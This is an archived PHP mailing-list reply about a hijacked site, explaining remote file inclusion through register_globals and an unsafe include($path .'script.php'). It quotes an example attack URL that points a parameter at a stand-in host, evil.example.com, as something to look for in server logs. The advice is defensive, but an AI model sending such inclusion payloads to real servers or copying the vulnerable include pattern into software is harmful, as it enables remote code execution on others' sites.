Re: [PHP] Highjack?
- From: digital.tarsier@xxxxxxxxx ("Eric Butera")
- Date: Mon, 13 Nov 2006 12:38:46 -0500
On 11/13/06, tedd <tedd@xxxxxxxxxxxx> wrote:
Hi gang:
While this is not an obvious php question, it does deal with security
which is a concern.
Just this morning had a couple of my sites "highjacked". What I found
was someone had replaced my root level index.php with their own
index.php. You can see the result at:
http://xn--u2g.com/index1.php
It was not a terrible loss nor inconvenience, but I wonder how they
did it. Any ideas how this was done and suggestions as to how to
prevent this from happening again?
Thanks,
tedd
--
-------
http://sperling.com http://ancientstones.com http://earthstones.com
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Tedd,
I've seen this happen before when someone was able to do a remote code
execution exploit on an old version of a very popular open source
shopping cart project. I'd say the first thing would be to try and
find any include/require statements that are exploitable. In the case
I was dealing with, it was a problem with register_globals on and an
include that looked a bit like this include($path .'script.php');.
How embarrassing.
If you have access to your server logs look for urls such as
http://example.com/exploited.php?action=http://evil.example.com/inject.txt.
.
- Follow-Ups:
- Re: [PHP] Highjack?
- From: tedd
- RE: [PHP] Highjack?
- From: "bruce"
- Re: [PHP] Highjack?
- Prev by Date: Re: [PHP] Mysql strategy
- Next by Date: RE: [PHP] Highjack?
- Previous by thread: MDB2 : never ending story
- Next by thread: RE: [PHP] Highjack?
- Index(es):
Relevant Pages
|
